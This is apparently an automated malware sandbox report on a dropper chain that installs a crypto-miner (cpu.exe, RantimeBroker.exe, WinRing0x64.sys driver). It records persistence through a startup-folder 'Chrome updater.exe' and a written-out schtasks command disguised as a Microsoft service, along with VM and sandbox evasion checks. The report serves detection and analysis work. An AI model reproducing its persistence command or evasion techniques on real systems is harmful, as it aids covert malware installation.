Source: RantimeBroker.exe.6.dr Static PE information: section name: .themida
Source: RantimeBroker.exe.6.dr Static PE information: section name: .boot
Source: cpu.exe.6.dr Static PE information: section name: _RANDOMX
Source: cpu.exe.6.dr Static PE information: section name: _SHA3_25
Source: cpu.exe.6.dr Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr Static PE information: section name: _RDATA
Source: cpu.exe.6.dr Static PE information: section name: 0
Source: cpu.exe.6.dr Static PE information: section name: 1
Source: Chrome updater.exe.25.dr Static PE information: section name:
Source: Chrome updater.exe.25.dr Static PE information: section name:
Source: Chrome updater.exe.25.dr Static PE information: section name:
Source: Chrome updater.exe.25.dr Static PE information: section name: .themida
Source: Chrome updater.exe.25.dr Static PE information: section name: .boot
Source: C:\Users\user\AppData\Local\nulhfhsi.exe Code function: 4_2_0057EF16 push edx; mov dword ptr [esp], edi
Source: C:\Users\user\AppData\Local\nulhfhsi.exe Code function: 4_2_0057EF16 push 27AFD0DBh; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\nulhfhsi.exe Code function: 4_2_0057EF16 push 2A72EC14h; mov dword ptr [esp], edi
Source: C:\Users\user\AppData\Local\nulhfhsi.exe Code function: 4_2_03726E26 push ss; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00406D5D push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00406D72 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00406D3B push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_008BB0BB push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_008BAD00 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_0042290C push dword ptr [ebp+eax-17h]; retf
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00853D8B push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00853DAD push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00853DC2 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00AB48B7 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABB885 push esi; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00AB309B push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00AB48EE push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00AB48D9 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABA020 push 00000000h; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABAA50 push ss; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABA587 push ss; retf
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00AB4598 push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00AB69EE push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABB3ED push edx; ret
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABA7D0 push edx; iretd
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00ABB103 push eax; retf
Source: initial sample Static PE information: section name: entropy: 7.60533357948
Source: initial sample Static PE information: section name: entropy: 7.89210158409
Source: initial sample Static PE information: section name: entropy: 7.89210158409
Source: initial sample Static PE information: section name: entropy: 7.95998591239

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
Source: C:\Users\user\AppData\Local\Temp\evs.exe File created: C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll
Source: C:\Users\user\AppData\Local\Temp\evs.exe File created: C:\Users\user\AppData\Local\Temp\jo.exe
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe File created: C:\Users\user\AppData\Local\nulhfhsi.exe
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe File created: C:\Users\user\AppData\Local\lxoqz3o0.exe
Source: C:\Users\user\AppData\Local\nulhfhsi.exe File created: C:\Users\user\AppData\Local\Temp\revs.exe
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
Source: C:\Users\user\AppData\Local\Temp\evs.exe File created: C:\Users\user\AppData\Local\Temp\hello_C#.exe
Source: C:\Users\user\AppData\Local\Temp\revs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
Source: C:\Users\user\AppData\Local\nulhfhsi.exe File created: C:\Users\user\AppData\Local\Temp\evs.exe
Source: C:\Users\user\AppData\Local\Temp\evs.exe File created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe File created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe

Boot Survival:

Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\revs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: C:\Users\user\AppData\Local\Temp\revs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 3214
Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 3214
Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 3214
Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 3214
Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 3214
Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49743
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\jo.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; System information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; System information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; System information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; System information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe; System information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; System information queried: FirmwareTableInformation
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; RDTSC instruction interceptor: First address: 0000000000C2B6D7, second address: 0000000000C2B6E3; instructions: 0x00000000 rdtsc; 0x00000002 movzx edx, ax; 0x00000005 bts edx, edx; 0x00000008 xor bl, cl; 0x0000000a rcl dl, cl; 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
